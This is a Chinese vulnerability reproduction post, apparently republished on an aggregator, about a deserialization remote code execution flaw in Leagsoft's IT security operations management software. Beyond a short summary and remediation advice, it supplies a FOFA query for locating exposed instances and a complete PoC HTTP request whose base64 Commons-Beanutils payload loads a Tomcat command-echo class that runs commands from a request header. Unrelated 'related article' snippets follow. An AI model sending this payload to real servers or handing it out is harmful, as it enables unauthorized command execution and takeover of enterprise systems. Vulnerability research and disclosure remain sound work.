联软 IT 安全运维管理软件反序列化漏洞复现

0x01 产品简介

 联软科技持续十多年研发的联软IT安全运维管理软件,集网络准入控制、终端安全管理、BYOD设备管理、杀毒管理、服务器安全管理、数据防泄密、反APT攻击等系统于一体,通过一个平台,统一框架,数据集中,实现更强更智能的安全保护,减轻安全管理负担,降低采购和维护成本。

0x02 漏洞概述

  联软IT安全运维管理软件,在 PolicySetDetailController 中 的queryPolicyUseConditionDetail 方法在对输入参数进行处理的过程中进行了反序列化操作,可使用 Commons-Beanutils 反序列化链进行RCE。攻击者可利用该漏洞执行任意代码,在服务器上执行命令、打入内存马等操作,获取服务器权限。

0x03 复现环境

FOFA:app="联软科技-IT安全运维管理系统"

0x04 漏洞复现 

PoC

POST /DBAService/PolicySetDetailController/queryPolicyUseConditionDetail HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 7257
Content-Type: application/x-www-form-urlencoded
X-Token-Data: whoami
Accept-Encoding: gzip
Connection: closebase64Serializable=rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB%2bAARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAAAAAAAdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX%2bAYIVOACAAB4cAAAEb/K/rq%2bAAAAMQD1AQA8b3JnL2FwYWNoZS90b21jYXQvY2F0YWxpbmEvd2VicmVzb3VyY2VzL1RvbWNhdEphcklucHV0U3RyZWFtBwABAQAQamF2YS9sYW5nL09iamVjdAcAAwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQA%2bTG9yZy9hcGFjaGUvdG9tY2F0L2NhdGFsaW5hL3dlYnJlc291cmNlcy9Ub21jYXRKYXJJbnB1dFN0cmVhbTsMAAUABgoABAAMAQABcQEAMyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEAB2V4ZWNDbWQMABAADwoAAgARAQAIPGNsaW5pdD4BAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HABQBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwAWAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcAGAEAAWUBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEAA2NscwEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAEdmFyNQEAIUxqYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uOwEABGJhb3MBAB9MamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW07AQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBABVqYXZhL2xhbmcvVGhyZWFkR3JvdXAHADgBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcAOgcANwEAEGphdmEvbGFuZy9UaHJlYWQHAD0BABBqYXZhL2xhbmcvU3RyaW5nBwA/AQAOamF2YS91dGlsL0xpc3QHAEEBAB1qYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbQcAQwEADVN0YWNrTWFwVGFibGUBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsMAEYARwoAPgBIAQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7DABKAEsKAD4ATAEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwATgBPCgAEAFAIADYBAA9qYXZhL2xhbmcvQ2xhc3MHAFMBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABVAFYKAFQAVwEADXNldEFjY2Vzc2libGUBAAQoWilWDABZAFoKADsAWwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABdAF4KADsAXwEAB2dldE5hbWUBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwwAYQBiCgA%2bAGMBAARleGVjCABlAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMAGcAaAoAQABpAQAEaHR0cAgAawEABnRhcmdldAgAbQEAEmphdmEvbGFuZy9SdW5uYWJsZQcAbwEABnRoaXMkMAgAcQEAB2hhbmRsZXIIAHMBAA1nZXRTdXBlcmNsYXNzDAB1AE8KAFQAdgEABmdsb2JhbAgAeAgALQEABHNpemUBAAMoKUkMAHsAfAsAQgB9AQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABdAH8LAEIAgAgAJAEAC2dldFJlc3BvbnNlCACDAQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwwAhQCGCgBUAIcBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHAIkBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAIsAjAoAigCNAQAJZ2V0SGVhZGVyCACPAQAMWC1Ub2tlbi1EYXRhCACRAQAHaXNFbXB0eQEAAygpWgwAkwCUCgBAAJUBAAlzZXRTdGF0dXMIAJcBABFqYXZhL2xhbmcvSW50ZWdlcgcAmQEABFRZUEUMAJsAHQkAmgCcAQAEKEkpVgwABQCeCgCaAJ8MAA4ADwoAAgChAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rCACjAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAKUApgoAVACnAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwAqQCqCgBUAKsBAAhzZXRCeXRlcwgArQEAAltCBwCvAQARZ2V0RGVjbGFyZWRNZXRob2QMALEAhgoAVACyAQALdG9CeXRlQXJyYXkBAAQoKVtCDAC0ALUKAEQAtgEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7DAC4ALkKAJoAugEAB2RvV3JpdGUIALwBABNqYXZhLm5pby5CeXRlQnVmZmVyCAC%2bAQAEd3JhcAgAwAEAE1tMamF2YS9sYW5nL1N0cmluZzsHAMIBABNqYXZhL2lvL0lucHV0U3RyZWFtBwDEAQAHb3MubmFtZQgAxgEAEGphdmEvbGFuZy9TeXN0ZW0HAMgBAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DADKAMsKAMkAzAEAC3RvTG93ZXJDYXNlDADOAGIKAEAAzwEAA3dpbggA0QEAA2NtZAgA0wEAAi9jCADVAQAJL2Jpbi9iYXNoCADXAQACLWMIANkBABFqYXZhL2xhbmcvUnVudGltZQcA2wEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAN0A3goA3ADfAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAZQDhCgDcAOIBABFqYXZhL2xhbmcvUHJvY2VzcwcA5AEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsMAOYA5woA5QDoCgBEAAwBAAV3cml0ZQEAByhbQklJKVYMAOsA7AoARADtAQAEcmVhZAEABShbQilJDADvAPAKAMUA8QEAClNvdXJjZUZpbGUBAA9Ub21jYXRFY2hvLmphdmEAIQACAAQAAAAAAAQAAQAFAAYAAQAHAAAALwABAAEAAAAFKrcADbEAAAACAAgAAAAGAAEAAAAGAAkAAAAMAAEAAAAFAAoACwAAAAkADgAPAAEABwAAABEAAQABAAAABSq4ABKwAAAAAAAIABMABgABAAcAAAVRAAgAEAAAAqgDO7gASbYATUwrtgBRElK2AFhNLAS2AFwsK7YAYMAAPMAAPE4DNgQVBC2%2bogJ4LRUEMjoFGQXHAAanAmQZBbYAZDoGGQYSZrYAapoADRkGEmy2AGqaAAanAkYZBbYAURJutgBYTSwEtgBcLBkFtgBgOgcZB8EAcJoABqcCIxkHtgBREnK2AFhNLAS2AFwsGQe2AGA6BxkHtgBREnS2AFhNpwAWOggZB7YAUbYAd7YAdxJ0tgBYTSwEtgBcLBkHtgBgOgcZB7YAUbYAdxJ5tgBYTacAEDoIGQe2AFESebYAWE0sBLYAXCwZB7YAYDoHGQe2AFESerYAWE0sBLYAXCwZB7YAYMAAQsAAQjoIAzYJFQkZCLkAfgEAogF5GQgVCbkAgQIAOgoZCrYAURKCtgBYTSwEtgBcLBkKtgBgOgsZC7YAURKEA70AVLYAiBkLA70ABLYAjjoMGQu2AFESkAS9AFRZAxJAU7YAiBkLBL0ABFkDEpJTtgCOwABAOgYZBsYBBRkGtgCWmgD9GQy2AFESmAS9AFRZA7IAnVO2AIgZDAS9AARZA7sAmlkRAMi3AKBTtgCOVxkGuACiOg0SpLgAqDoOGQ62AKw6BxkOEq4GvQBUWQMSsFNZBLIAnVNZBbIAnVO2ALMZBwa9AARZAxkNtgC3U1kEuwCaWQO3AKBTWQUZDbYAt764ALtTtgCOVxkMtgBREr0EvQBUWQMZDlO2AIgZDAS9AARZAxkHU7YAjlenAFE6DhK/uACoOg8ZDxLBBL0AVFkDErBTtgCzGQ8EvQAEWQMZDbYAt1O2AI46BxkMtgBREr0EvQBUWQMZD1O2AIgZDAS9AARZAxkHU7YAjlcEOxqZAAanAAmECQGn/oEamQAGpwAOpwAFOgWEBAGn/YenAARLsQAIAJUAoACjABUAwwDRANQAFQG8AjECNAAXAC4AOQKbABkAPABXApsAGQBaAHoCmwAZAH0ClQKbABkAAAKjAqYAGQADAAgAAAD2AD0AAAAKAAIACwAJAAwAEwANABgADgAkAA8ALgARADQAEgA8ABMAQwAUAFoAFQBlABYAagAXAHIAGAB9ABkAiAAaAI0AGwCVAB0AoAAgAKMAHgClAB8AtgAhALsAIgDDACQA0QAnANQAJQDWACYA4QAoAOYAKQDuACoA%2bQArAP4ALAEMAC0BGwAuASYALwExADABNgAxAT4AMgFXADMBfQA0AYoANQG1ADYBvAA4AcMAOQHKADoCDwA7AjEAQAI0ADwCNgA9Aj0APgJgAD8CggBBAoQAQwKLAC0CkQBFApgARwKbAEYCnQAPAqMASwKmAEoCpwBMAAkAAADAABMApQARABoAGwAIANYACwAaABsACAHDAG4AHAAdAA4CPQBFABwAHQAPAjYATAAeAB8ADgG8AMgAIAAhAA0BJgFlACIAIwAKAT4BTQAkACMACwFXATQAJQAjAAwBDwGCACYAJwAJADQCZAAoACkABQBDAlUAKgArAAYAcgImACwAIwAHAQwBjAAtAC4ACAAnAnwALwAnAAQAAgKhADAAMQAAAAkCmgAyADMAAQATApAANAA1AAIAJAJ/ADYANwADAEUAAACVABX/ACcABQEHADkHADsHADwBAAD8ABQHAD78ABoHAEAC/AAiBwAEZQcAFRJdBwAVDP0ALQcAQgH/ASQADgEHADkHADsHADwBBwA%2bBwBABwAEBwBCAQcABAcABAcABAcARAABBwAX%2bwBN%2bgAB%2bAAG%2bgAF/wAGAAUBBwA5BwA7BwA8AQAAQgcAGQH/AAUAAAAAQgcAGQAACQAQAA8AAQAHAAAA4gAEAAcAAACMKgGlAAoqtgCWmQAGpwB2AUwSx7gAzbYA0BLStgBqmQAZBr0AQFkDEtRTWQQS1lNZBSpTTKcAFga9AEBZAxLYU1kEEtpTWQUqU0y4AOArtgDjtgDpTbsARFm3AOpOAzYEEQQAvAg6BacADC0ZBQMVBLYA7iwZBbYA8lk2BAKg/%2b0tsKcACDoGpwADAbAAAQAAAIIAhQAZAAEARQAAADwACQwC/AAnBf8AEgACBwBABwDDAAD/AB8ABgcAQAcAwwcAxQcARAEHALAAAAj/AA4AAQcAQAAAQgcAGQQAAQDzAAAAAgD0dXEAfgAQAAABEMr%2bur4AAAAzABEBADJvcmcvYXBhY2hlL3dpY2tldC9mYWNlbGV0cy9jb21waWxlci9UcmltbWVkVGFnVW5pdAcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQATVHJpbW1lZFRhZ1VuaXQuamF2YQEAEHNlcmlhbFZlcnNpb25VSUQBAAFKBXHmae48bUcYAQANQ29uc3RhbnRWYWx1ZQEABjxpbml0PgEAAygpVgwADAANCgAEAA4BAARDb2RlACEAAgAEAAAAAQAaAAcACAABAAsAAAACAAkAAQABAAwADQABABAAAAARAAEAAQAAAAUqtwAPsQAAAAAAAQAFAAAAAgAGcHQACEFVRE9XSVFLcHcBAHhxAH4ADXg=

PS:CB1+Tomcatcmd回显 +base64编码

0x05 修复建议

官方已修复该漏洞,请联系厂商升级版本:http://www.leagsoft.com

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/186616.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Android中在google Map 上绘制历史路径

很多的App都会有这种需求,需要把自己的轨迹绘制在地图上来加标一段行踪,使得自己的行程展现出来,通过地图的展示,自己的行程也就一目了然了。 这里利用Google Map 把自己的行程展现出来,注意这里用到了上一章的基础&a…

C语言——写一个简单函数,找两个数中最大者

#include <stdio.h>int max( int a, int b ) { return a>b ? a:b; }int main() { int a, b;printf("输入两个数:\n");scanf("%d %d", &a, &b);printf("max %d\n", max(a, b));return 0; }输出结果&#xff1a;

csdn最新最全面的Jmeter接口测试:jmeter_逻辑控制器_循环控制器

循环控制器 循环次数&#xff1a;设置该控制器下的请求的循环执行次数 永远&#xff1a;勾选上的话&#xff0c;会一直循环&#xff0c;即所谓死循环 注意&#xff1a;如果线程组本身已经设置了循环次数的话&#xff0c;那循环控制元件控制的子节点 的循环次数为线程组设置的…

Rust的Vec优化

本篇是对Rust编程语言17_Rust的Vec优化[1]学习与记录 MiniVec https://crates.io/crates/minivec enum DataWithVec { // tag,uint64,8字节 I32(i32), // 4字节,但需内存对齐到8字节? F64(f64), // 8字节 Bytes(Vec<u8>), // 24字节}fn main()…

浅聊代理(应用部署)

以前很少接触过项目的上线部署&#xff0c; 我对前后端交互的认知还停留在前端一个请求 对应后端一个API 比如后端提供: /api/backend/categories -GET 前端则通过使用ajax或者axios组件去构建http请求&#xff0c; 发送到: https://host:port/api/backend/categories -GET 一、…

安全高效的PostgreSQL数据库迁移解决方案

PostgreSQL数据库是一款高度可扩展的开源数据库系统&#xff0c;支持复杂的查询、事务完整性和多种数据类型&#xff0c;这使得它成为企业中处理大规模和多样化数据需求的理想选择。在很多企业中&#xff0c;PostgreSQL不仅处理大量的交易数据&#xff0c;还支持复杂的数据分析…

Django二转Day03 04

0 cbv执行流程&#xff0c;self问题 path(index/, Myview.as_view()),Myview.as_view() 实例化后返回 变成return Myview.dispatch(request, *args, **kwargs)但是视图函数Myview中没有 dispatch 方法 所以去 父类View中寻找return View.dispatch(request, *args, **kwargs)调用…

Selenium(12):层级定位_通过父元素找到子元素

层级定位 在实际的项目测试中&#xff0c;经常会遇到无法直接定位到需要选取的元素&#xff0c;但是其父元素比较容易定位&#xff0c;通过定位父元素再遍历其子元素选择需要的目标元素&#xff0c;或者需要定位某个元素下所有的子元素。 层级定位的思想是先定位父对象&#xf…

【腾讯云云上实验室】向量数据库+LangChain+LLM搭建智慧辅导系统实践

目录 一、搭建智慧辅导系统——向量数据库实践指南1.1、创建向量数据库并新建集合1.2、使用 TKE 快速部署 ChatGLM1.3、部署 LangChain PyPDFVectorDB等组件1.4、配置知识库语料1.5、基于 VectorDB LLM 的智能辅导助手 二、LLM时代的次世代引擎——向量数据库2.1、向量数据库L…

FastDFS+Nginx - 本地搭建文件服务器同时实现在外远程访问「内网穿透」

文章目录 前言1. 本地搭建FastDFS文件系统1.1 环境安装1.2 安装libfastcommon1.3 安装FastDFS1.4 配置Tracker1.5 配置Storage1.6 测试上传下载1.7 与Nginx整合1.8 安装Nginx1.9 配置Nginx 2. 局域网测试访问FastDFS3. 安装cpolar内网穿透4. 配置公网访问地址5. 固定公网地址5.…

ProgrammingError: nan can not be used with MySQL

该错误怎么发生的&#xff1f; 我们先在本地创建测试表&#xff1a; CREATE TABLE users_test (id int NOT NULL AUTO_INCREMENT COMMENT 主键,trade_account varchar(50) DEFAULT NULL COMMENT 交易账号,username varchar(50) DEFAULT NULL,email varchar(100) DEFAULT NULL…

数字系列——数字经济

数字经济是全球经济未来发展方向&#xff0c;正在成为重组全球要素资源、重塑全球经济结构、改变全球竞争格局的关键力量。都知道数字经确实很重要&#xff0c;但有些人还傻傻搞不懂数字经济到底是什么&#xff1f;小编今天就给大家捋一捋。 什么是数字经济&#xff1f; 数字经…

Glove学习笔记

global vectors for word representation B站学习视频 1、LSA与word2vec 我们用我们的见解&#xff0c;构建一个新的模型&#xff0c;Glove&#xff0c;全局向量的词表示&#xff0c;因为这个模型捕捉到全局预料的统计信息。 LSA:全局矩阵分解word2vec&#xff1a;局部上下文…

AI生成的图片有版权了

我是卢松松&#xff0c;点点上面的头像&#xff0c;欢迎关注我哦&#xff01; 把发到小红书的AI图片搬运到百家号&#xff0c;然后被起诉了! 长知识了&#xff0c;原来AI生成的图片也有版权了&#xff0c;AI生成图片著作权第一案判了&#xff0c;这绝对是一件划时代事情&…

微信小程序真机调试技巧,解决各种疑难杂症

1.在真机上看log 也许你调试的时候&#xff0c;会使用到真机调试或者预览模式或者体验版模式&#xff0c;这些模式都有可能出现意想不到的bug问题&#xff0c;这时候调试模式就非常非常重要了&#xff0c;特别是给领导看的时候&#xff0c;在领导手机上出现bug了&#xff0c;这…

QT 项目中添加文件夹(分类文件)

为了更方便的整理项目的文件&#xff0c;添加文件夹把文件进行分类。 1.首先在项目文件中创建新的文件夹 2.把需要归类的文件放入新建的文件中 3.右键然后选择add..... 4.运行此程序&#xff0c;会报错因为文件路径改变了&#xff0c;需要在.pro中修改路径 注意事项 文件夹内部…

NSSCTF第14页(2)

[UUCTF 2022 新生赛]ezpop 提示说看看反序列化字符串逃逸 PHP反序列化字符串逃逸_php反序列化逃逸-CSDN博客 php反序列化字符逃逸_php反序列化逃逸_Leekos的博客-CSDN博客 buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)_extract($_post);…

码云配置遇到秘钥不正确

你这个就是秘钥没有和git绑定&#xff0c; 需要 git config --global user.name "你的用户名随便写" git config --global user.email "你的邮箱"

DCAMnet网络复现与讲解

距论文阅读完毕已经过了整整一周多。。。终于抽出时间来写这篇辣&#xff01;~ 论文阅读笔记放这里&#xff1a; 基于可变形卷积和注意力机制的带钢表面缺陷快速检测网络DCAM-Net&#xff08;论文阅读笔记&#xff09;-CSDN博客 为了方便观看&#xff0c;我把结构图也拿过来了。…

软考:2024年软考高级:软件工程

软考&#xff1a;2024年软考高级: 提示&#xff1a;系列被面试官问的问题&#xff0c;我自己当时不会&#xff0c;所以下来自己复盘一下&#xff0c;认真学习和总结&#xff0c;以应对未来更多的可能性 关于互联网大厂的笔试面试&#xff0c;都是需要细心准备的 &#xff08;1…